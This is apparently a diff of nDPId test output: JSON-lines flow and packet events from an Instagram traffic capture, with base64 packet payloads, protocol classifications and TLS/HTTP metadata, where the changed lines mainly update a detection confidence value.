older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"telegraph-ash.instagram.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 01299{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1436720898551,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":679,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":679,"pkt_l4_len":645,"thread_ts_msec":1436720898551,"pkt":"QPMIw47hABsv8H60CABFAAKZ5iRAAFUG\/+kfDV00wKgAZwG7hJCk1JOYiMGTh4AYAE6DfwAAAQEIClpSq5UAA+qLFwMBAmB3TNLiDxMdaG\/77FJR8O6B7ETM5PL1YEwRicjM0iP0UHaAjwUM69tZJRboKPSJSylQ1372woiRMUoGT0dkqivXwS77nykGpDpQxH2zG\/qLmXj10Apbm9mNJzojbuGkVAQeXciVaLovJfxV8pe4ApuOMtqX+wzNa0ZzIxrRfdGy1r+REoc96\/duttzeccU7r8F+0sSj4kAMBptpjPxHIWmQ8bvcQmsOZTBbtWqbInBydwnOzZKHuUG4UpWsNoKQLrxSa1ETAsjugoyEe5PPT8+cb8Irh4mKsNfbStX5KDjpe9Dme8aKUCL1ceYHHjALeMY9l4fx2o0KIF6TukGkzvqR8cZ+qcyDG5U\/HYh5lxYTcHS7lDXS1PzV6XOR41h1cZ9L+KxXE6JczRHCSiNT1VF7boI4Qizj5lEdfdajhSQHOEg16UAhsZHpgK1G5Iki1ek6rdWyUqwchJMZYUThaRdJpKv9RM0OW9cAtKW4cZKenq0TEdOPDEBRCwskRboA6Gi3YnhJ3qdvDGkTLGo9t+FpkGczAZZn4gKC4xoEybQb10OFqFb4BP0BHlc1dmzqbYjWeEKW2wJjaNEaqdUvlusDaKzJPAfd\/FC3qcdqBy6RoP1rw6AWfXgFirXb5SF1IsZGaICO7Vi\/A05NBIj2TN+sAkrMTvlnJxzijI3OS4z\/O7pdS0yJ1AhdM2CbNqiTSP1\/fSWG2i895LYIERx7TAiABxyhh9ufac6WLn1D9wJV86snpuHfJEPWipx7pSJs20IjfVBIUe\/onrcoOjL6GotP95FotxVNOdpbLqczmpv1mQ=="} -01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720898354,"flow_last_seen":1436720898646,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":609,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1436720898646,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"telegraph-ash.instagram.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"acb741bcdffb787c5a52654c78645bdf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} -00661{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":49,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720898386,"flow_last_seen":1436720900498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":19727,"flow_avg_l4_payload_len":616,"midstream":1,"thread_ts_msec":1436720900498,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720898354,"flow_last_seen":1436720898646,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":609,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1436720898646,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"telegraph-ash.instagram.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"acb741bcdffb787c5a52654c78645bdf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} +00661{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":49,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720898386,"flow_last_seen":1436720900498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":19727,"flow_avg_l4_payload_len":616,"midstream":1,"thread_ts_msec":1436720900498,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900684,"flow_last_seen":1436720900684,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720900684,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00819{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1436720900684,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":326,"pkt_l4_len":292,"thread_ts_msec":1436720900684,"pkt":"ABsv8H60QPMIw47hCABFAAE4wXBAAEAGQn\/AqABnLiFGoJegAFCP9SVkp0jV34AYH+olJAAAAQEICgAD63Ga3vWjR0VUIC9ocGhvdG9zLWFrLXhhcDEvdDUxLjI4ODUtMTUvZTM1LzEwODU5OTk0XzEwMDk0MzM3OTI0MzQ0NDdfMTYyNzY0NjA2Ml9uLmpwZz9zZT03IEhUVFAvMS4xDQpIb3N0OiBwaG90b3MtaC5hay5pbnN0YWdyYW0uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBJbnN0YWdyYW0gNy4xLjEgQW5kcm9pZCAoMTkvNC40LjI7IDQ4MGRwaTsgMTA4MHgxOTIwOyBzYW1zdW5nOyBHVC1JOTUwNTsgamZsdGU7IHFjb207IGl0X0lUKQ0KDQo="} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900684,"flow_last_seen":1436720900684,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720900684,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-h.ak.instagram.com","url":"photos-h.ak.instagram.com\/hphotos-ak-xap1\/t51.2885-15\/e35\/10859994_1009433792434447_1627646062_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900684,"flow_last_seen":1436720900684,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720900684,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-h.ak.instagram.com","url":"photos-h.ak.instagram.com\/hphotos-ak-xap1\/t51.2885-15\/e35\/10859994_1009433792434447_1627646062_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900687,"flow_last_seen":1436720900687,"flow_idle_time":7580000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"thread_ts_msec":1436720900687,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00810{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1436720900687,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":319,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":319,"pkt_l4_len":285,"thread_ts_msec":1436720900687,"pkt":"ABsv8H60QPMIw47hCABFAAEx0CVAAEAGO5vAqABnUlUaouJQAFA6kgvvKZIczIAYH0cqkQAAAQEICgAD63FWCuc2R0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTE1LzExMzg2NTI0XzExMDI1NzYxOTMxNzQzMF8zNzk1MTM2NTRfbi5qcGcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1nLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBqZmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900687,"flow_last_seen":1436720900687,"flow_idle_time":7580000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"thread_ts_msec":1436720900687,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e15\/11386524_110257619317430_379513654_n.jpg","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900687,"flow_last_seen":1436720900687,"flow_idle_time":7580000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"thread_ts_msec":1436720900687,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e15\/11386524_110257619317430_379513654_n.jpg","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900690,"flow_last_seen":1436720900690,"flow_idle_time":7580000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900690,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1436720900690,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":325,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":325,"pkt_l4_len":291,"thread_ts_msec":1436720900690,"pkt":"ABsv8H60QPMIw47hCABFAAE3v7dAAEAGS+vAqABnUlUauq1bAFCj1oFKfMvpWoAYDTz8dgAAAQEICgAD63JUYaBjR0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTM1LzExMzc5MTQ4XzE0NDkxMjAyMjg3NDUzMTZfNjA3NDc3OTYyX24uanBnP3NlPTcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1lLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBqZmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900690,"flow_last_seen":1436720900690,"flow_idle_time":7580000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900690,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900690,"flow_last_seen":1436720900690,"flow_idle_time":7580000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900690,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900692,"flow_last_seen":1436720900692,"flow_idle_time":7580000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900692,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1436720900692,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":325,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":325,"pkt_l4_len":291,"thread_ts_msec":1436720900692,"pkt":"ABsv8H60QPMIw47hCABFAAE3iBFAAEAGg5LAqABnUlUaueJtAFAE8EMOWjfyZYAYD+bdMQAAAQEICgAD63JZ6ogYR0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExNDI0NjIzXzE2MDgxNjMxMDk0NTA0MjFfNjYzMzE1ODgzX24uanBnP3NlPTcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1mLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBqZmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900692,"flow_last_seen":1436720900692,"flow_idle_time":7580000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900692,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-f.ak.instagram.com","url":"photos-f.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11424623_1608163109450421_663315883_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900692,"flow_last_seen":1436720900692,"flow_idle_time":7580000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900692,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-f.ak.instagram.com","url":"photos-f.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11424623_1608163109450421_663315883_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 02377{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1436720900716,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900716,"pkt":"QPMIw47hABsv8H60CABFAAW+uH1AADkGTewuIUagwKgAZwBQl6CnSNXfj\/UmaIAQAiku5gAAAQEICprfPdsAA+txSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBTYXQsIDExIEp1bCAyMDE1IDE2OjU3OjA4IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTUwMDMxDQpDYWNoZS1Db250cm9sOiBuby10cmFuc2Zvcm0sIG1heC1hZ2U9MTIwOTYwMA0KRXhwaXJlczogU3VuLCAyNiBKdWwgMjAxNSAxNzowODoyMCBHTVQNCkRhdGU6IFN1biwgMTIgSnVsIDIwMTUgMTc6MDg6MjAgR01UDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AfFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABfHAIoAFpGQk1EMjMwMDA5NjkwMTAwMDBjMzQ3MDAwMDEzNjQwMDAwNjM4NDAwMDA4MzJiMDEwMDBiODUwMTAwODdkZjAxMDAwZDRhMDIwMDlkYTIwMjAwNzY3MzAzMDAA\/9sAQwAGBgYGBgYLBgYLEAsLCxAVEBAQEBUbFRUVFRUbIBsbGxsbGyAgICAgICAgJycnJycnLS0tLS0zMzMzMzMzMzMz\/9sAQwEICAgNDA0WDAwWNSQeJDU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1\/8IAEQgEDwQPAwEiAAIRAQMRAf\/EABwAAAEFAQEBAAAAAAAAAAAAAAUBAgMEBgAHCP\/EABoBAAMBAQEBAAAAAAAAAAAAAAABAgMEBQb\/2gAMAwEAAhADEAAAANnYrv6OWePnpwvl4Ucr5ZqutmsxzGNFZbBKECWI2oX8gp+rqOdscgJarTJrPTiAtUZEnHz0qOljcEskD1c01Rksi2ko7C10FaSJqLDY0bkkglRK+J01IqIm99eIL6jmheWgjCKVJUTsjcmxJXNVG3K1KNr3irtvMCithKVbraoq9cQKb5mse+vydpRzhEXinDIvFyoIspSDsdW4LfVORbSFGS9z0Q07Vapihe24SRFCV8D5p7U4fInJNSacY9CnDoLekTpOusTppdQVRUWk5Z3S6nSOaiisOZWrWqtSjFjqVjcxzA+ktxbdV5FmYfOO1PR5O6tOVN6dGCvruavqOenPG2AT0hWptvhfNzvglTijkaS2WB9FlYElvdXcE7qNkc6sYnO6nwWWwvB6cwHJ3BI+Pk7LqzU7SQPCRiRBzWw1M8o9Wr7h8yd2Yes0RUdMne6nInZbXUcjq0gpefEOw6FZdhsSpo1\/NNSRGRwz8KussbUKdHc9LXYK7JQkHbZE9CMRrLHVuCy6tIhIp+ajbOxDZOaN8kM6b52TRosiOmpWqktXN4fR9WcyxQQ3Mi1m1NxKzxO57gjldCOau1Guh6KocxG0s90jNuePlRqSaiqL7xrhlZBD1ROCogrq0VC86jwXI66CmfUcy84e5MlIKemSZRcnZWo5lqOCIVpafMuyjnIKtHOmrjanNWmV0at9VUdlavIty0UHfcNVBHhvASbQRlyCBWndG1xZlpvVXVpuTtPpPHelHPmiqjZJuxJVci8tKRVa6m0Lsg1QJNocO+lKMV1BqVN+Km1zbjrI1P1ZzUr6iNEZRL5ZRw56q6yDgmfWQLsg16ZNg3hkHi+ETQdInbdS4duCJorHU42r7hqMKoMQCnCeAuojkF0F8BRBzhkEpcFpK6im5sQ5GRJU57qi78tptbhTpBzLHQKE7qrwsdX4LS1+Ts9Uc1YWugWOruCfoFCwtRydla3CsLCo7DIlTl6FQm6BQnWuoT9DwSpCoS9DwTdA4JVrqE\/QKOx0ChM6u5EjoeCVY+ZIiIA="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1436720900717,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720900717,"pkt":"ABsv8H60QPMIw47hCABFAAA0wXFAAEAGQ4LAqABnLiFGoJegAFCP9SZop0jbaYAQH+o19wAAAQEICgAD63Sa3z3b"} 02375{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1436720900744,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900744,"pkt":"QPMIw47hABsv8H60CABFAAW+u1hAADkGUttSVRqiwKgAZwBQ4lApkhzMOpIM7IAQAku18QAAAQEIClYLL1sAA+txSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBTYXQsIDExIEp1bCAyMDE1IDE2OjMyOjE3IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTEyMjY4DQpEYXRlOiBTdW4sIDEyIEp1bCAyMDE1IDE3OjA4OjIwIEdNVA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0xMjA5NjAwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AbFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABPHAIoAEpGQk1EMGYwMDA3NWIwMTAwMDBjZDFlMDAwMDUxNmQwMDAwYTY3YjAwMDBkMzhhMDAwMDQ3MTMwMTAwZDU4MDAxMDA4Y2I2MDEwMAD\/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoHBwYIDAoMDAsKCwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT\/2wBDAQMEBAUEBQkFBQkUDQsNFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT\/wgARCAKAAoADASIAAhEBAxEB\/8QAHQAAAAYDAQAAAAAAAAAAAAAAAAECAwUGBAcICf\/EABsBAAIDAQEBAAAAAAAAAAAAAAABAgMEBQYH\/9oADAMBAAIQAxAAAADRJrP1fOIlpAgZgklAaSWREiWQ0hYBBKMG1GQ0mshINSQNKwDZqISVGBpCiEDBAlSiBIUY0GoAhRgEhRMIlm0hLpRTallISS1AgnEASgbEmowbUamIMzBKgaCCgBEs2NLM2INRiSFhiApTEksNJDhobBqHjA10yQHEiSSgCQoARGYJBhCQZgklkCTCgQThDSSzabMzAkuECSUY0gwJJmbEGogIGpiCWaEBSgbNRAk1hiCcJCDUGkGshpCjEkKVJthagbCzEgKMEmYAjNQICzaaWoAhZmxAUYIUZySQsAQcITZqJSxlGVMgDAJCwCUrCEBQYgwoEBQQkzAJBmxKXSBBmbEAGggowSlYBIcQJKloYRrJCQtLEmsASVhiA4kRGYGQUQkk4AQsEwgswbNZNESw2kzUk2awBJdKQg1KQ2ow0ROkNBOpEk1BhBZtEDMASgCCdCMMwuixAcIEBYE2HEjbNYBBOkNAUoSCWTaTCiKSWBthwkkBZAQUGINwDaCjkkhZobDgBCXDE0pYbQThobDiXEicJjalhNIMCSayBCjAEa0ySQ4